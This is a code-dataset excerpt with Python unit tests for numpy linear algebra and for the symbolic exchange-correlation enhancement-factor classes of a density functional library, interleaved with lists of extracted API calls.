{}), "('Bins')\n", (12496, 12504), True, 'import matplotlib.pyplot as plt\n'), ((12505, 12526), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Density"""'], {}), "('Density')\n", (12515, 12526), True, 'import matplotlib.pyplot as plt\n'), ((12581, 12591), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12589, 12591), True, 'import matplotlib.pyplot as plt\n'), ((12603, 12633), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12615, 12633), True, 'import matplotlib.pyplot as plt\n'), ((12710, 12738), 'numpy.log2', 'np.log2', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12717, 12738), True, 'import numpy as np\n'), ((12864, 12884), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (12874, 12884), True, 'import matplotlib.pyplot as plt\n'), ((12885, 12916), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Total Attribution"""'], {}), "('Total Attribution')\n", (12895, 12916), True, 'import matplotlib.pyplot as plt\n'), ((12917, 12927), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12925, 12927), True, 'import matplotlib.pyplot as plt\n'), ((2130, 2177), 'torch.zeros_like', 'torch.zeros_like', (['token_type_ids'], {'device': 'device'}), '(token_type_ids, device=device)\n', (2146, 2177), False, 'import torch\n'), ((2328, 2385), 'torch.arange', 'torch.arange', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2340, 2385), False, 'import torch\n'), ((2409, 2465), 'torch.zeros', 'torch.zeros', (['seq_length'], {'dtype': 'torch.long', 'device': 'device'}), '(seq_length, dtype=torch.long, device=device)\n', (2420, 2465), False, 'import torch\n'), ((2702, 2728), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (2717, 2728), False, 'import torch\n'), ((5303, 5329), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5315, 5329), False, 'import torch\n'), ((5335, 5361), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (5347, 5361), False, 'import torch\n'), ((5596, 5620), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5608, 5620), False, 'import torch\n'), ((5626, 5650), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (5638, 5650), False, 'import torch\n'), ((7218, 7238), 'torch.topk', 'torch.topk', (['attrs', 'k'], {}), '(attrs, k)\n', (7228, 7238), False, 'import torch\n'), ((10234, 10304), 'captum.attr.LayerConductance', 'LayerConductance', (['squad_pos_forward_func2', 'model.bert.encoder.layer[i]'], {}), '(squad_pos_forward_func2, model.bert.encoder.layer[i])\n', (10250, 10304), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11153, 11180), 'numpy.array', 'np.array', (['layer_attrs_start'], {}), '(layer_attrs_start)\n', (11161, 11180), True, 'import numpy as np\n'), ((11416, 11441), 'numpy.array', 'np.array', (['layer_attrs_end'], {}), '(layer_attrs_end)\n', (11424, 11441), True, 'import numpy as np\n'), ((12820, 12833), 'numpy.arange', 'np.arange', (['(12)'], {}), '(12)\n', (12829, 12833), True, 'import numpy as np\n'), ((355, 380), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (378, 380), False, 'import torch\n'), ((1799, 1839), 'torch.tensor', 'torch.tensor', (['[input_ids]'], {'device': 'device'}), '([input_ids], device=device)\n', (1811, 1839), False, 'import torch\n'), ((1841, 1885), 'torch.tensor', 'torch.tensor', (['[ref_input_ids]'], {'device': 'device'}), '([ref_input_ids], device=device)\n', (1853, 1885), False, 'import torch\n'), ((4983, 5007), 'torch.norm', 'torch.norm', (['attributions'], {}), '(attributions)\n', (4993, 5007), False, 'import torch\n'), ((5259, 5296), 'torch.softmax', 'torch.softmax', (['start_scores[0]'], {'dim': '(0)'}), '(start_scores[0], dim=0)\n', (5272, 5296), False, 'import torch\n'), ((5554, 5589), 'torch.softmax', 'torch.softmax', (['end_scores[0]'], {'dim': '(0)'}), '(end_scores[0], dim=0)\n', (5567, 5589), False, 'import torch\n'), ((11895, 11939), 'numpy.histogram', 'np.histogram', (['attrs'], {'bins': 'bins', 'density': '(True)'}), '(attrs, bins=bins, density=True)\n', (11907, 11939), True, 'import numpy as np\n'), ((12124, 12154), 'numpy.array', 'np.array', (['layer_attrs_end_dist'], {}), '(layer_attrs_end_dist)\n', (12132, 12154), True, 'import numpy as np\n'), ((4281, 4307), 'torch.argmax', 'torch.argmax', (['start_scores'], {}), '(start_scores)\n', (4293, 4307), False, 'import torch\n'), ((4310, 4334), 'torch.argmax', 'torch.argmax', (['end_scores'], {}), '(end_scores)\n', (4322, 4334), False, 'import torch\n')]
|
# -*- coding: UTF-8 -*-
from unittest import TestCase
class TestNumpy(TestCase):
def test_dot(self):
from numpy import array, dot
A = array([[1,2],[3,4]], dtype='int32')
B = array([[5,6],[7,8]], dtype='int32')
R = array([[19,22],[43,50]], dtype='int32')
for val in (dot(A,B)-R).flat:
self.assertEqual(val, 0)
u = array([1,1], dtype='int32')
Ru = array([3,7], dtype='int32')
for val in (dot(A,u)-Ru).flat:
self.assertEqual(val, 0)
def test_eig(self):
from numpy import array, dot
from numpy.linalg import eig, inv
A = array([[1,2],[3,4]], dtype='int32')
vals, mat = eig(A)
lbd = dot(dot(inv(mat), A), mat)
for i in range(2):
self.assertAlmostEqual(vals[i], lbd[i,i], places=14)
|
[
"numpy.array",
"numpy.dot",
"numpy.linalg.inv",
"numpy.linalg.eig"
] |
[((157, 195), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (162, 195), False, 'from numpy import array, dot\n'), ((205, 243), 'numpy.array', 'array', (['[[5, 6], [7, 8]]'], {'dtype': '"""int32"""'}), "([[5, 6], [7, 8]], dtype='int32')\n", (210, 243), False, 'from numpy import array, dot\n'), ((253, 295), 'numpy.array', 'array', (['[[19, 22], [43, 50]]'], {'dtype': '"""int32"""'}), "([[19, 22], [43, 50]], dtype='int32')\n", (258, 295), False, 'from numpy import array, dot\n'), ((380, 408), 'numpy.array', 'array', (['[1, 1]'], {'dtype': '"""int32"""'}), "([1, 1], dtype='int32')\n", (385, 408), False, 'from numpy import array, dot\n'), ((421, 449), 'numpy.array', 'array', (['[3, 7]'], {'dtype': '"""int32"""'}), "([3, 7], dtype='int32')\n", (426, 449), False, 'from numpy import array, dot\n'), ((641, 679), 'numpy.array', 'array', (['[[1, 2], [3, 4]]'], {'dtype': '"""int32"""'}), "([[1, 2], [3, 4]], dtype='int32')\n", (646, 679), False, 'from numpy import array, dot\n'), ((697, 703), 'numpy.linalg.eig', 'eig', (['A'], {}), '(A)\n', (700, 703), False, 'from numpy.linalg import eig, inv\n'), ((313, 322), 'numpy.dot', 'dot', (['A', 'B'], {}), '(A, B)\n', (316, 322), False, 'from numpy import array, dot\n'), ((469, 478), 'numpy.dot', 'dot', (['A', 'u'], {}), '(A, u)\n', (472, 478), False, 'from numpy import array, dot\n'), ((726, 734), 'numpy.linalg.inv', 'inv', (['mat'], {}), '(mat)\n', (729, 734), False, 'from numpy.linalg import eig, inv\n')]
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for symbolic.enhancement_factors."""
import copy
from absl.testing import absltest
from absl.testing import parameterized
import jax
import numpy as np
import sympy
from symbolic_functionals.syfes.symbolic import enhancement_factors
from symbolic_functionals.syfes.symbolic import instructions
from symbolic_functionals.syfes.xc import gga
from symbolic_functionals.syfes.xc import mgga
jax.config.update('jax_enable_x64', True)
class EnhancementFactorTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.num_features = 2
self.num_shared_parameters = 2
self.num_variables = 3
self.features = {
f'feature_{i}': np.random.rand(5) for i in range(self.num_features)
}
self.shared_parameters = {
f'shared_parameter_{i}': np.random.rand()
for i in range(self.num_shared_parameters)
}
self.bound_parameters = {'gamma_utransform': np.random.rand()}
self.parameters = {**self.shared_parameters, **self.bound_parameters}
self.variables = {
f'variable_{i}': np.zeros(5) for i in range(self.num_variables - 1)
}
self.variables.update({'enhancement_factor': np.zeros(5)})
self.enhancement_factor = enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[
instructions.MultiplicationInstruction(
'variable_0', 'feature_0', 'shared_parameter_0'),
instructions.AdditionInstruction(
'variable_1', 'feature_1', 'shared_parameter_1'),
instructions.AdditionInstruction(
'variable_1', 'variable_1', 'variable_0'),
instructions.Power2Instruction('enhancement_factor', 'variable_1'),
instructions.UTransformInstruction(
'enhancement_factor', 'enhancement_factor')
])
def test_constructor(self):
self.assertEqual(self.enhancement_factor.num_features, self.num_features)
self.assertEqual(self.enhancement_factor.num_parameters,
self.num_shared_parameters + 1) # 1 from UTransform
self.assertEqual(self.enhancement_factor.num_variables, self.num_variables)
def test_constructor_without_enhancement_factor_in_variable_names(self):
with self.assertRaisesRegex(
ValueError, '"enhancement_factor" not found in variable_names.'):
enhancement_factors.EnhancementFactor(
feature_names=[],
shared_parameter_names=[],
variable_names=[],
instruction_list=[])
def test_constructor_with_repeated_name(self):
with self.assertRaisesRegex(ValueError, 'Repeated names found in input.'):
enhancement_factors.EnhancementFactor(
feature_names=['var'],
shared_parameter_names=['var'],
variable_names=['enhancement_factor'],
instruction_list=[])
def test_constructor_with_wrong_instruction_type(self):
with self.assertRaisesRegex(
TypeError, r"1 is of type <class 'int'>, not an "
'instance of instructions.Instruction'):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[1])
@parameterized.parameters(
(instructions.Power2Instruction('variable_0', 'var'),
(r'Instruction variable_0 = var \*\* 2 contains invalid input argument '
'var')),
(instructions.AdditionInstruction('variable_0', 'shared_parameter_1',
'gamma_utransform'),
(r'Instruction variable_0 = shared_parameter_1 \+ gamma_utransform '
'contains invalid input argument gamma_utransform')),
)
def test_constructor_with_invalid_input(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(
(instructions.Power2Instruction('feature_0', 'shared_parameter_0'),
(r'Instruction feature_0 = shared_parameter_0 \*\* 2 contains '
'invalid output argument feature_0')),
(instructions.AdditionInstruction(
'feature_1', 'shared_parameter_1', 'variable_1'),
(r'Instruction feature_1 = shared_parameter_1 \+ variable_1 contains '
'invalid output argument feature_1')
),
(instructions.Power4Instruction(
'bound_parameter_1', 'shared_parameter_1'),
(r'Instruction bound_parameter_1 = shared_parameter_1 \*\* 4 contains '
'invalid output argument bound_parameter_1')
),
)
def test_constructor_with_invalid_output(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(False, True)
def test_eval(self, use_jax):
tmp = (
(self.features['feature_0'] * self.parameters['shared_parameter_0']) +
(self.features['feature_1'] + self.parameters['shared_parameter_1']))
tmp = self.parameters['gamma_utransform'] * tmp ** 2
expected_f = tmp / (1. + tmp)
f = self.enhancement_factor.eval(
self.features, self.parameters, use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u_short.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2_short.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma_utransform': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(
(enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
'gamma'),
(enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
'gamma_utransform'),
)
def test_wb97mv_enhancement_factors(self,
f_x_wb97mv,
f_css_wb97mv,
f_cos_wb97mv,
gamma_key):
rho = np.random.rand(5)
x = np.random.rand(5)
tau = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
t = mgga.get_mgga_t(rho, tau, polarized=False)
w = (t - 1) / (t + 1)
expected_f_x = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'],
power_series=mgga.WB97MV_PARAMS['power_series_x'], polarized=False)
expected_f_css = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'],
power_series=mgga.WB97MV_PARAMS['power_series_ss'], polarized=False)
expected_f_cos = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'],
power_series=mgga.WB97MV_PARAMS['power_series_os'], polarized=False)
f_x = f_x_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_x'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_x'][1][2],
'c01': mgga.WB97MV_PARAMS['power_series_x'][2][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_x']})
f_css = f_css_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_ss'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_ss'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_ss'][2][2],
'c43': mgga.WB97MV_PARAMS['power_series_ss'][3][2],
'c04': mgga.WB97MV_PARAMS['power_series_ss'][4][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_ss']})
f_cos = f_cos_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_os'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_os'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_os'][2][2],
'c60': mgga.WB97MV_PARAMS['power_series_os'][3][2],
'c21': mgga.WB97MV_PARAMS['power_series_os'][4][2],
'c61': mgga.WB97MV_PARAMS['power_series_os'][5][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_os']})
np.testing.assert_allclose(f_x, expected_f_x)
np.testing.assert_allclose(f_css, expected_f_css)
np.testing.assert_allclose(f_cos, expected_f_cos)
def test_convert_enhancement_factor_to_and_from_dict(self):
self.assertEqual(
self.enhancement_factor,
enhancement_factors.EnhancementFactor.from_dict(
self.enhancement_factor.to_dict()))
@parameterized.parameters(
enhancement_factors.f_empty,
enhancement_factors.f_lda,
enhancement_factors.f_b97_u,
enhancement_factors.f_b97_u_short,
enhancement_factors.f_b97_x2,
enhancement_factors.f_b97_x2_short,
enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
)
def test_make_isomorphic_copy(self, enhancement_factor):
features = {
feature_name: np.random.rand(5)
for feature_name in enhancement_factor.feature_names
}
shared_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.shared_parameter_names
}
renamed_shared_parameters = {
(enhancement_factor._isomorphic_copy_shared_parameter_prefix
+ str(index)): value
for index, value in enumerate(shared_parameters.values())
}
bound_parameters = {
parameter_name: np.random.rand()
for parameter_name in enhancement_factor.bound_parameter_names
}
enhancement_factor_copy = enhancement_factor.make_isomorphic_copy()
np.testing.assert_allclose(
enhancement_factor.eval(
features=features, parameters={
**shared_parameters, **bound_parameters}),
enhancement_factor_copy.eval(
features=features, parameters={
**renamed_shared_parameters, **bound_parameters})
)
def test_make_isomorphic_copy_of_f_x_wb97mv_short(self):
f_x_wb97mv_copy = enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(
feature_names=['rho', 'x2', 'w'],
num_shared_parameters=10,
num_variables=10)
self.assertEqual(f_x_wb97mv_copy.feature_names, ['rho', 'x2', 'w'])
self.assertEqual(f_x_wb97mv_copy.num_shared_parameters, 10)
self.assertEqual(
f_x_wb97mv_copy.shared_parameter_names,
[f_x_wb97mv_copy._isomorphic_copy_shared_parameter_prefix + str(index)
for index in range(10)])
self.assertEqual(
f_x_wb97mv_copy.variable_names,
[f_x_wb97mv_copy._isomorphic_copy_variable_prefix + str(index)
for index in range(9)] + ['enhancement_factor'])
def test_make_isomorphic_copy_enhancement_factor_variable_location(self):
f_x_wb97mv_shuffled = copy.deepcopy(enhancement_factors.f_x_wb97mv_short)
f_x_wb97mv_shuffled.variable_names.remove('enhancement_factor')
f_x_wb97mv_shuffled.variable_names.insert(
np.random.randint(len(f_x_wb97mv_shuffled.variable_names)),
'enhancement_factor')
self.assertEqual(
enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy(),
f_x_wb97mv_shuffled.make_isomorphic_copy())
def test_make_isomorphic_copy_repeated_feature_names(self):
with self.assertRaisesRegex(
ValueError, 'Repeated feature names'):
enhancement_factors.f_b97_u.make_isomorphic_copy(
feature_names=['u', 'u'])
def test_make_isomorphic_copy_wrong_feature_names(self):
with self.assertRaisesRegex(
ValueError,
r"feature_names \['rho', 'x2'\] is not a superset of feature_names of "
r"current instance \['w', 'x2'\]"):
enhancement_factors.f_x_wb97mv.make_isomorphic_copy(
feature_names=['rho', 'x2'])
def test_make_isomorphic_copy_wrong_num_shared_parameters(self):
with self.assertRaisesRegex(
ValueError, 'num_shared_parameters 5 is smaller than '
'that of current instance 6'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_shared_parameters=5)
def test_make_isomorphic_copy_wrong_num_variables(self):
with self.assertRaisesRegex(
ValueError, 'num_variables 3 is smaller than '
'that of current instance 5'):
enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy(
num_variables=3)
@parameterized.parameters(
(enhancement_factors.f_b97_u, 3),
(enhancement_factors.f_b97_u_short, 3),
(enhancement_factors.f_b97_x2, 4),
(enhancement_factors.f_b97_x2_short, 4),
(enhancement_factors.f_x_wb97mv_short, 4),)
def test_num_used_parameters(
self, enhancement_factor, expected_num_used_parameters):
self.assertEqual(enhancement_factor.num_used_parameters,
expected_num_used_parameters)
self.assertEqual(
enhancement_factor.make_isomorphic_copy(
num_shared_parameters=20).num_used_parameters,
expected_num_used_parameters)
def test_get_symbolic_expression(self):
c0, c1, c2, gamma, x = sympy.symbols(
'c0 c1 c2 gamma_utransform x')
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=False, simplify=False),
(c0 + c1 * gamma * x ** 2 / (gamma * x ** 2 + 1.)
+ c2 * gamma ** 2 * x ** 4 / (gamma * x ** 2 + 1.) ** 2))
def test_get_symbolic_expression_latex(self):
self.assertEqual(
enhancement_factors.f_b97_x2_short.get_symbolic_expression(
latex=True, simplify=False),
r'c_{0} + \frac{c_{1} \gamma_{u} x^{2}}{\gamma_{u} x^{2} + 1.0} + '
r'\frac{c_{2} \gamma_{u}^{2} x^{4}}{\left(\gamma_{u} x^{2} + '
r'1.0\right)^{2}}')
if __name__ == '__main__':
absltest.main()
|
[
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.eval",
"numpy.random.rand",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_cos_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2_short.get_symbolic_expression",
"symbolic_functionals.syfes.symbolic.instructions.MultiplicationInstruction",
"copy.deepcopy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval",
"symbolic_functionals.syfes.symbolic.instructions.AdditionInstruction",
"symbolic_functionals.syfes.xc.mgga.get_mgga_t",
"numpy.testing.assert_allclose",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv_short.make_isomorphic_copy",
"symbolic_functionals.syfes.symbolic.enhancement_factors.EnhancementFactor",
"symbolic_functionals.syfes.symbolic.instructions.Power2Instruction",
"symbolic_functionals.syfes.xc.gga.u_b97",
"absl.testing.absltest.main",
"symbolic_functionals.syfes.xc.gga.f_b97",
"sympy.symbols",
"symbolic_functionals.syfes.xc.mgga.f_b97m",
"symbolic_functionals.syfes.symbolic.instructions.Power4Instruction",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval",
"jax.config.update",
"symbolic_functionals.syfes.symbolic.instructions.UTransformInstruction",
"absl.testing.parameterized.parameters",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval",
"numpy.zeros",
"symbolic_functionals.syfes.symbolic.enhancement_factors.f_x_wb97mv.make_isomorphic_copy"
] |
[((1008, 1049), 'jax.config.update', 'jax.config.update', (['"""jax_enable_x64"""', '(True)'], {}), "('jax_enable_x64', True)\n", (1025, 1049), False, 'import jax\n'), ((6022, 6059), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6046, 6059), False, 'from absl.testing import parameterized\n'), ((6499, 6536), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (6523, 6536), False, 'from absl.testing import parameterized\n'), ((7010, 7047), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7034, 7047), False, 'from absl.testing import parameterized\n'), ((7533, 7570), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (7557, 7570), False, 'from absl.testing import parameterized\n'), ((8075, 8112), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(False)', '(True)'], {}), '(False, True)\n', (8099, 8112), False, 'from absl.testing import parameterized\n'), ((8640, 8932), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (["(enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, 'gamma')", "(enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform')"], {}), "((enhancement_factors.f_x_wb97mv,\n enhancement_factors.f_css_wb97mv, enhancement_factors.f_cos_wb97mv,\n 'gamma'), (enhancement_factors.f_x_wb97mv_short, enhancement_factors.\n f_css_wb97mv_short, enhancement_factors.f_cos_wb97mv_short,\n 'gamma_utransform'))\n", (8664, 8932), False, 'from absl.testing import parameterized\n'), ((11615, 12069), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['enhancement_factors.f_empty', 'enhancement_factors.f_lda', 'enhancement_factors.f_b97_u', 'enhancement_factors.f_b97_u_short', 'enhancement_factors.f_b97_x2', 'enhancement_factors.f_b97_x2_short', 'enhancement_factors.f_x_wb97mv', 'enhancement_factors.f_css_wb97mv', 'enhancement_factors.f_cos_wb97mv', 'enhancement_factors.f_x_wb97mv_short', 'enhancement_factors.f_css_wb97mv_short', 'enhancement_factors.f_cos_wb97mv_short'], {}), '(enhancement_factors.f_empty, enhancement_factors.\n f_lda, enhancement_factors.f_b97_u, enhancement_factors.f_b97_u_short,\n enhancement_factors.f_b97_x2, enhancement_factors.f_b97_x2_short,\n enhancement_factors.f_x_wb97mv, enhancement_factors.f_css_wb97mv,\n enhancement_factors.f_cos_wb97mv, enhancement_factors.f_x_wb97mv_short,\n enhancement_factors.f_css_wb97mv_short, enhancement_factors.\n f_cos_wb97mv_short)\n', (11639, 12069), False, 'from absl.testing import parameterized\n'), ((15622, 15854), 'absl.testing.parameterized.parameters', 'parameterized.parameters', (['(enhancement_factors.f_b97_u, 3)', '(enhancement_factors.f_b97_u_short, 3)', '(enhancement_factors.f_b97_x2, 4)', '(enhancement_factors.f_b97_x2_short, 4)', '(enhancement_factors.f_x_wb97mv_short, 4)'], {}), '((enhancement_factors.f_b97_u, 3), (\n enhancement_factors.f_b97_u_short, 3), (enhancement_factors.f_b97_x2, 4\n ), (enhancement_factors.f_b97_x2_short, 4), (enhancement_factors.\n f_x_wb97mv_short, 4))\n', (15646, 15854), False, 'from absl.testing import parameterized\n'), ((17014, 17029), 'absl.testing.absltest.main', 'absltest.main', ([], {}), '()\n', (17027, 17029), False, 'from absl.testing import absltest\n'), ((6453, 6494), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6479, 6494), True, 'import numpy as np\n'), ((6655, 6672), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (6669, 6672), True, 'import numpy as np\n'), ((6681, 6708), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (6690, 6708), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6726, 6738), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (6735, 6738), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((6748, 6890), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u.eval', 'enhancement_factors.f_b97_u.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (6780, 6890), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((6964, 7005), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (6990, 7005), True, 'import numpy as np\n'), ((7172, 7189), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7186, 7189), True, 'import numpy as np\n'), ((7198, 7225), 'symbolic_functionals.syfes.xc.gga.u_b97', 'gga.u_b97', (['x'], {'gamma': 'gamma_x'}), '(x, gamma=gamma_x)\n', (7207, 7225), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7243, 7255), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7252, 7255), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7265, 7413), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_u_short.eval', 'enhancement_factors.f_b97_u_short.eval', ([], {'features': "{'u': u}", 'parameters': "{'c0': coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}", 'use_jax': 'use_jax'}), "(features={'u': u}, parameters={'c0':\n coeffs_x[0], 'c1': coeffs_x[1], 'c2': coeffs_x[2]}, use_jax=use_jax)\n", (7303, 7413), False, 'from symbolic_functionals.syfes.symbolic import enhancement_factors\n'), ((7487, 7528), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['f', 'expected_f'], {}), '(f, expected_f)\n', (7513, 7528), True, 'import numpy as np\n'), ((7690, 7707), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (7704, 7707), True, 'import numpy as np\n'), ((7759, 7771), 'symbolic_functionals.syfes.xc.gga.f_b97', 'gga.f_b97', (['x'], {}), '(x)\n', (7768, 7771), False, 'from symbolic_functionals.syfes.xc import gga\n'), ((7781, 7948), 'symbolic_functionals.syfes.symbolic.enhancement_factors.f_b97_x2.eval', 